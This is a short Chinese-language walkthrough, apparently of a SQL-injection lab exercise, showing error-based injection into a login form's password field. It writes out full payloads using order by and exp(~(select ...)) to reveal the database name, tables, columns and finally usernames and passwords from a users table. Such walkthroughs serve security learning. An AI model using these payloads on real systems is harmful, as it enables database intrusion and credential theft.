前言
摸鱼..........
一、抓包、判断注入点
二、判断回显字段
其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看
passwd=12123"order by 2--+
三、获取数据库
uname=admin&passwd=12123"and exp(~(select * from (select database() ) a) )--+
四、获取数据表
uname=admin&passwd=12123"and exp(~(select * from (select group_concat(table_name) from information_schema.tables where table_schema=database() ) a) )--+
五、获取字段
uname=admin&passwd=12123"and exp(~(select * from (select group_concat(column_name) from information_schema.columns where table_name='users' ) a) )--+
六、获取用户名、密码
uname=admin&passwd=12123" and exp(~(select * from (select group_concat(username,0x3a,password)
from users) a) )--+